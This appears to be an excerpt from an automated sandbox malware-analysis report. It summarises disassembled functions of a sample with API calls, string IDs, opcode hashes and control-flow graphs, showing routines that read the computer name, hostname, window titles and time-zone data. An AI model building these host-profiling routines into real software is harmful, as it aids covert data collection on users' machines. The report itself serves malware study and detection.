                                • Opcode ID: 06fe561cce2fde8dcaf83c154c60d3c65bf286a3f1319ac57604408ed68671d2
                                • Instruction ID: 1e0072f937f323780afaaa459f60d0e45f3846cb26623a87e4208710311e8fc9
                                • Opcode Fuzzy Hash: 06fe561cce2fde8dcaf83c154c60d3c65bf286a3f1319ac57604408ed68671d2
                                • Instruction Fuzzy Hash: 4F220476E0060EDBDF009F54D880BDE7774FF09348F118699FD9866690EB319AA8CB91
                                Function 100425EC Relevance: 9.3, APIs: 6, Instructions: 285COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2342 100425ec-100425fa 2343 100425fc-1004260d call 100497f1 call 100414b7 2342->2343 2344 1004260f-1004261f 2342->2344 2364 10042662-10042666 2343->2364 2346 10042634-1004263a 2344->2346 2347 10042621-10042632 call 100497f1 call 100414b7 2344->2347 2350 10042642-10042648 2346->2350 2351 1004263c 2346->2351 2369 10042661 2347->2369 2356 10042667-10042681 call 100518fa call 10050e74 2350->2356 2357 1004264a 2350->2357 2354 10042654-1004265e call 100497f1 2351->2354 2355 1004263e-10042640 2351->2355 2367 10042660 2354->2367 2355->2350 2355->2354 2371 10042687-10042693 call 10050ea0 2356->2371 2372 10042872-1004288c call 100414e4 call 10051139 2356->2372 2357->2354 2362 1004264c-10042652 2357->2362 2362->2354 2362->2356 2367->2369 2369->2364 2371->2372 2378 10042699-100426a5 call 10050ecc 2371->2378 2384 100428a1-100428a3 2372->2384 2385 1004288e-10042892 call 100425ec 2372->2385 2378->2372 2383 100426ab-100426c0 2378->2383 2386 10042730-1004273b call 10051177 2383->2386 2387 100426c2 2383->2387 2392 10042897-1004289f 2385->2392 2386->2367 2395 10042741-1004274c 2386->2395 2390 100426c4-100426ca 2387->2390 2391 100426cc-100426e8 call 10051177 2387->2391 2390->2386 2390->2391 2391->2367 2399 100426ee-100426f1 2391->2399 2392->2384 2397 1004274e-10042757 call 1005194d 2395->2397 2398 10042768 2395->2398 2397->2398 2407 10042759-10042766 2397->2407 2401 1004276b-1004277f call 10060030 2398->2401 2402 100426f7-10042700 call 1005194d 2399->2402 2403 1004286b-1004286d 2399->2403 2410 10042781-10042789 2401->2410 2411 1004278c-100427b3 call 1005fea0 call 10060030 2401->2411 2402->2403 2412 10042706-1004271e call 10051177 2402->2412 2403->2367 2407->2401 2410->2411 2420 100427b5-100427be 2411->2420 2421 100427c1-100427e8 call 1005fea0 call 10060030 2411->2421 2412->2367 2418 10042724-1004272b 2412->2418 2418->2403 2420->2421 2426 100427f6-10042805 call 1005fea0 2421->2426 2427 100427ea-100427f3 2421->2427 2430 10042807 2426->2430 2431 1004282d-1004284b 2426->2431 2427->2426 2434 1004280d-10042821 2430->2434 2435 10042809-1004280b 2430->2435 2432 1004284d-10042866 2431->2432 2433 10042868 2431->2433 2432->2403 2433->2403 2434->2403 2435->2434 2436 10042823-10042825 2435->2436 2436->2403 2437 10042827 2436->2437 2437->2431 2438 10042829-1004282b 2437->2438 2438->2403 2438->2431
                                APIs
                                • __allrem.LIBCMT ref: 10042776
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10042792
                                • __allrem.LIBCMT ref: 100427A9
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100427C7
                                • __allrem.LIBCMT ref: 100427DE
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100427FC
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 5a632a87e7081925c05750c335bdd88a943fbf03be889ba1cf27fc3701b1fcbd
                                • Instruction ID: d5479bc1b746727abca6d8f9757406ec68e7b7bbf4155c34677e3b1bd49904a4
                                • Opcode Fuzzy Hash: 5a632a87e7081925c05750c335bdd88a943fbf03be889ba1cf27fc3701b1fcbd
                                • Instruction Fuzzy Hash: B481F376B01B06ABE710DE69CC82B5A73E9EF40764F71423EF510D7281EB70E9048B98
                                Function 6C2BF7DA Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 209COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,%s$.;C:\Astrolog\$NULL
                                • API String ID: 0-2992153177
                                • Opcode ID: b244bf0ad7123347a7a7e4e880863111e02802aa3d2df2bec2d655838b9f0be9
                                • Instruction ID: a743ca7dabd09ea6fdeb9010d25aa8760125af8dd707d763814a56f001f04768
                                • Opcode Fuzzy Hash: b244bf0ad7123347a7a7e4e880863111e02802aa3d2df2bec2d655838b9f0be9
                                • Instruction Fuzzy Hash: FD711B7990525F5FCB10CF289854BDAB7B8AB0535CF2446FAE898E7691EB3146898F00
                                Function 6C27404F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 6C291472: _sprintf.LIBCMT ref: 6C2914BC
                                  • Part of subcall function 6C291472: _sprintf.LIBCMT ref: 6C2914E0
                                • __CxxThrowException@8.LIBCMT ref: 6C2740AA
                                  • Part of subcall function 6C300FF1: KiUserExceptionDispatcher.NTDLL(?,?,6C2F5E3B,?,?,?,?,?,6C2F5E3B,?,6C362DBC,6C390A30), ref: 6C301033
                                • _memset.LIBCMT ref: 6C2740C4
                                • GetModuleFileNameA.KERNEL32(00000000,?,000000FF), ref: 6C2740D9
                                • MessageBoxA.USER32(00000000,GameBegin,00000000,00000000), ref: 6C2740F4
                                  • Part of subcall function 6C2D2A72: SHDeleteKeyA.SHLWAPI(80000001,Software\Classes\.as,?,?,6C2CDE40), ref: 6C2D2A85
                                  • Part of subcall function 6C2D2A72: SHDeleteKeyA.SHLWAPI(80000001,Software\Classes\Astrolog.as,?,?,6C2CDE40), ref: 6C2D2A91
                                  • Part of subcall function 6C2865F4: _memset.LIBCMT ref: 6C28662D
                                  • Part of subcall function 6C2865F4: _memset.LIBCMT ref: 6C286643
                                  • Part of subcall function 6C286B34: _memset.LIBCMT ref: 6C286B68
                                  • Part of subcall function 6C2F2E33: _doexit.LIBCMT ref: 6C2F2E3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: _memset$Delete_sprintf$DispatcherExceptionException@8FileMessageModuleNameThrowUser_doexit
                                • String ID: GameBegin
                                • API String ID: 2408732992-2407867525
                                • Opcode ID: f9123b620b20f85d6389e973a04b93b7604e0a72eb1f5fbb032ae8a6f293ec0a
                                • Instruction ID: beff25c14336a4a1eb1210a930883098c36a80395b83a0e1d9bc3819177d9bb2
                                • Opcode Fuzzy Hash: f9123b620b20f85d6389e973a04b93b7604e0a72eb1f5fbb032ae8a6f293ec0a
                                • Instruction Fuzzy Hash: 3621CFB060225E9FDF24AF7488C59D976BCEB1630DB50047AF919D2E40DB3489888F71
                                Function 1001CAE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetComputerNameW.KERNEL32(?,00000200), ref: 1001CB27
                                • lstrcpyW.KERNEL32(?,10077510), ref: 1001CB3D
                                • wsprintfW.USER32 ref: 1001CB69
                                • lstrlenW.KERNEL32(?), ref: 1001CB73
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: ComputerNamelstrcpylstrlenwsprintf
                                • String ID: Time
                                • API String ID: 2137660125-3483776891
                                • Opcode ID: 0d86f43cf8aff1c96b5c1221564300b5aa5e20fb4681d5bdfc798f6ad99b5944
                                • Instruction ID: 3e6a45b9b470fbc869b3f012b6210870463603dc6c33235bc886a16c7cdcfef5
                                • Opcode Fuzzy Hash: 0d86f43cf8aff1c96b5c1221564300b5aa5e20fb4681d5bdfc798f6ad99b5944
                                • Instruction Fuzzy Hash: 43118FB5900228ABE714DB64CC8AFDB777CEB44601F0141A5F709E6142EF74AB88CBA4
                                Function 100514E0 Relevance: 7.9, APIs: 5, Instructions: 376timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: _free$InformationTimeZone
                                • String ID:
                                • API String ID: 597776487-0
                                • Opcode ID: d2a1c661eeab8fe2ccda79241d1e7e9c5a7a17148dfb404b2796e1f3565e554a
                                • Instruction ID: 5944b97e054a481ea07992aa34664951c7c548f22b03f4b78325800655bf825d
                                • Opcode Fuzzy Hash: d2a1c661eeab8fe2ccda79241d1e7e9c5a7a17148dfb404b2796e1f3565e554a
                                • Instruction Fuzzy Hash: 45C14675E042599FDB11CF78CC81AEE7BF9EF45250F2541AAE884D7282EB309E49C750
                                Function 1001CBA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetComputerNameW.KERNEL32(?,00000200), ref: 1001CBF5
                                • lstrcpyW.KERNEL32(?,10077510), ref: 1001CC0B
                                • wsprintfW.USER32 ref: 1001CC37
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: ComputerNamelstrcpywsprintf
                                • String ID: Remark
                                • API String ID: 2045598086-3865500943
                                • Opcode ID: 41c774fbd50cdb4b117e5591b852dfc880d65e9c52b26308cb5e22cccdd32118
                                • Instruction ID: b3f827b17ac0b056ac70bbdc4e75ce27e2abaede2ac2f1ecf34c5bf4031cd120
                                • Opcode Fuzzy Hash: 41c774fbd50cdb4b117e5591b852dfc880d65e9c52b26308cb5e22cccdd32118
                                • Instruction Fuzzy Hash: 1421A8B5D40218AAEB14D764CD46FCA73ADEB00701F404596F708BA182EFB5AB848BD4
                                Function 1000B9D0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                Download Yara Rule
                                APIs
                                • GetForegroundWindow.USER32 ref: 1000B9F0
                                • GetTopWindow.USER32(00000000), ref: 1000B9FF
                                • GetWindowTextLengthW.USER32(00000000), ref: 1000BA3C
                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 1000BA9E
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: Window$Text$ForegroundLength
                                • String ID:
                                • API String ID: 1471897267-0
                                • Opcode ID: 3d17bf614a9b19a3ebe21ce52a279043732c0d42b8e04fd6304377340a176a11
                                • Instruction ID: f5465e67f4ccfb34a7407618dca653fffe2592f44dfeaf943761977b0b72cbef
                                • Opcode Fuzzy Hash: 3d17bf614a9b19a3ebe21ce52a279043732c0d42b8e04fd6304377340a176a11
                                • Instruction Fuzzy Hash: F331B374A047059BD714CF28C81676BF7E9EF85644F008A1EF88A8B250EBB4EA448792
                                Function 10011A00 Relevance: 5.3, APIs: 4, Instructions: 294COMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 10011D6C
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-0
                                • Opcode ID: 29c01c5153810fce39ab4b27d04142ac06fe52652b89456ca7a689fc236b89a3
                                • Instruction ID: f3143f391f0517f03d2711e34f5f78023d9b528400ad956a5550ea6a7af18503
                                • Opcode Fuzzy Hash: 29c01c5153810fce39ab4b27d04142ac06fe52652b89456ca7a689fc236b89a3
                                • Instruction Fuzzy Hash: 8EA1F874E002199FEF24CFA4DC85BEE7BB6FF45354F104228E415AB292DB34A985CB61
                                Function 1001944C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                Download Yara Rule
                                APIs
                                • wsprintfW.USER32 ref: 10019464
                                  • Part of subcall function 1001CAE0: GetComputerNameW.KERNEL32(?,00000200), ref: 1001CB27
                                  • Part of subcall function 1001CAE0: lstrcpyW.KERNEL32(?,10077510), ref: 1001CB3D
                                  • Part of subcall function 1001CAE0: wsprintfW.USER32 ref: 1001CB69
                                  • Part of subcall function 1001CAE0: lstrlenW.KERNEL32(?), ref: 1001CB73
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: wsprintf$ComputerNamelstrcpylstrlen
                                • String ID: +$tasktime
                                • API String ID: 1932226818-2742412719
                                • Opcode ID: a71690afc4177896275e162c754cac9cb1aa73dc16bf86ce23c540c854ca97f1
                                • Instruction ID: d866fd5828c63630ef7eb7cf9d4e4059614f1f7a34494511adf1fe88d1a7de53
                                • Opcode Fuzzy Hash: a71690afc4177896275e162c754cac9cb1aa73dc16bf86ce23c540c854ca97f1
                                • Instruction Fuzzy Hash: A2F09A319082689FCB15DB14EC4579AB764FB44214F0080AAE80AAB282DB786A94CB90
                                Function 6C2732F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegisterClassA.USER32(6C39A988), ref: 6C273314
                                • CreateWindowExA.USER32(00000000,Message Window,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 6C27333F
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: ClassCreateRegisterWindow
                                • String ID: Message Window
                                • API String ID: 3469048531-1814804990
                                • Opcode ID: 0a201bcb46748fa96ac2ce648e386fa89dbc8101f4037050ef011477c91002d8
                                • Instruction ID: 850967939fa41ed84df5b33f86757dcd25904ba000c57186eb03f424f419f74a
                                • Opcode Fuzzy Hash: 0a201bcb46748fa96ac2ce648e386fa89dbc8101f4037050ef011477c91002d8
                                • Instruction Fuzzy Hash: 8BE0EEF0B12608BEEF558FA8CC0AF367A7CF30A201B128309F80186610F67A68409F31
                                Function 100516BD Relevance: 4.7, APIs: 3, Instructions: 173timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,1006A608), ref: 10051727
                                • _free.LIBCMT ref: 10051715
                                  • Part of subcall function 1004D9B2: HeapFree.KERNEL32(00000000,00000000,?,1005AA7F,10053BE7,00000000,10053BE7,?,?,1005AD24,10053BE7,00000007,10053BE7,?,10058D36,10053BE7), ref: 1004D9C8
                                  • Part of subcall function 1004D9B2: GetLastError.KERNEL32(10053BE7,?,1005AA7F,10053BE7,00000000,10053BE7,?,?,1005AD24,10053BE7,00000007,10053BE7,?,10058D36,10053BE7,10053BE7), ref: 1004D9DA
                                • _free.LIBCMT ref: 100518E3
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 2155170405-0
                                • Opcode ID: 0a9afe676757fbac900952ed88f34385681e04743330df06d8487b9b6f66e1b8
                                • Instruction ID: ae1caa736d89166b0db1018e9d2eac3869d6e7b19e4e3805c26ca96c628e2ac8
                                • Opcode Fuzzy Hash: 0a9afe676757fbac900952ed88f34385681e04743330df06d8487b9b6f66e1b8
                                • Instruction Fuzzy Hash: BF51B475D04219ABEB11DBA98C819EE77FCFF44250B2146ABE454D7291EB30AE48CB50
                                Function 1005181A Relevance: 4.6, APIs: 3, Instructions: 80COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 1005188D
                                • _free.LIBCMT ref: 100518E3
                                  • Part of subcall function 100516BD: _free.LIBCMT ref: 10051715
                                  • Part of subcall function 100516BD: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,1006A608), ref: 10051727
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: _free$InformationTimeZone
                                • String ID:
                                • API String ID: 597776487-0
                                • Opcode ID: c015f96a86172428804c22dab89c8f003ee46ac2ac38053fcf19e22af9cc9150
                                • Instruction ID: 769e4cc0021f4a8ee0288658ed8287d3b7955195c702cdf757401fe74b216e31
                                • Opcode Fuzzy Hash: c015f96a86172428804c22dab89c8f003ee46ac2ac38053fcf19e22af9cc9150
                                • Instruction Fuzzy Hash: 8E21C676C0422967E731D7259C81EEA77BCEB41760F2103A7E898E2191EF706DC98A94
                                Function 1000A920 Relevance: 4.6, APIs: 3, Instructions: 80memoryCOMMON
                                Download Yara Rule
                                APIs
                                • __floor_pentium4.LIBCMT ref: 1000A96D
                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 1000A995
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: AllocVirtual__floor_pentium4
                                • String ID:
                                • API String ID: 4174053956-0
                                • Opcode ID: ca2fadb11b78880022fd620a6bfc8c65ebc753ad8cf0125fa148e2bc209761ce
                                • Instruction ID: 23107b6d779a8230bbb2392973feb2951df0fac37201d0ea6cbcca7204baf38b
                                • Opcode Fuzzy Hash: ca2fadb11b78880022fd620a6bfc8c65ebc753ad8cf0125fa148e2bc209761ce
                                • Instruction Fuzzy Hash: EF21F572704B149AE310DA39EC81A17F7E8EB453A1F014B3AFA86D6190EB71E890C791
                                Function 1000BB20 Relevance: 4.6, APIs: 3, Instructions: 75networkCOMMON
                                Download Yara Rule
                                APIs
                                • gethostname.WS2_32(?,00000100), ref: 1000BB53
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 1000BB6F
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 1000BBB4
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$gethostname
                                • String ID:
                                • API String ID: 2445153122-0
                                • Opcode ID: 8220a0e5b3adec0511fb902189cbbe93e367e5842becd02a05235d6e5f907661
                                • Instruction ID: 6ae64a3ab1f62f0a90e46849d51f8ee7803add071dfa6f0a7ff8e62bf13427a4
                                • Opcode Fuzzy Hash: 8220a0e5b3adec0511fb902189cbbe93e367e5842becd02a05235d6e5f907661
                                • Instruction Fuzzy Hash: 6A217E705083549FE310CF24CC05BABB7E8FF89714F000A5EF99996290EBB4AA48C7D2
                                Function 6C273FFB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3_catch_GS.LIBCMT ref: 6C274005
                                  • Part of subcall function 6C273021: _memset.LIBCMT ref: 6C27304F
                                  • Part of subcall function 6C273021: GetModuleFileNameA.KERNEL32(?,000000FF), ref: 6C273124
                                  • Part of subcall function 6C294AFA: _fgetc.LIBCMT ref: 6C294B43
                                  • Part of subcall function 6C294AFA: _sprintf.LIBCMT ref: 6C294B6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: FileH_prolog3_catch_ModuleName_fgetc_memset_sprintf
                                • String ID: astrolog.as
                                • API String ID: 2788110157-2633699130
                                • Opcode ID: 5397b2ed1af2499649616feef455ca93615cf36c59d2ab6ba80c63d5bff64c62
                                • Instruction ID: 4908025cc9178ec6e0e4101dccd24ca5fab4936859fdbb1cb02ff5c01e93d900
                                • Opcode Fuzzy Hash: 5397b2ed1af2499649616feef455ca93615cf36c59d2ab6ba80c63d5bff64c62
                                • Instruction Fuzzy Hash: FCF03A7171726A8BDF286FB9A8C94597678AB0B60D310053FED1296E40CF70C4848F61
                                Function 10020270 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 71659396b64506a3f915f866e0e6d0d22f97fd8679baf7c5a502e18912562ded
                                • Instruction ID: e7775b81cd5a67c59352e7e14569520216d341204271b2a9fcb849079d0047a8
                                • Opcode Fuzzy Hash: 71659396b64506a3f915f866e0e6d0d22f97fd8679baf7c5a502e18912562ded
                                • Instruction Fuzzy Hash: 7C31E2B2A007049BCB00CF68E8417DAF7E9EF55360F10822AF499D7651E775AA84CB90
                                Function 1001ED90 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                • CompareStringW.KERNELBASE(00000800,00000001,?,00000001,100772E4,00000001,00000000,?,1008D880,?,?,1001EF86), ref: 1001EDB5
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: CompareString
                                • String ID:
                                • API String ID: 1825529933-0
                                • Opcode ID: 329863f654be77b7aa99de90060457f735ac7f351ea3de8cce6a6f4fc65d937a
                                • Instruction ID: 4cdd57567af10c333d344e70a6ee3f7fe84ae6836bac624ff216e6e62135134a
                                • Opcode Fuzzy Hash: 329863f654be77b7aa99de90060457f735ac7f351ea3de8cce6a6f4fc65d937a
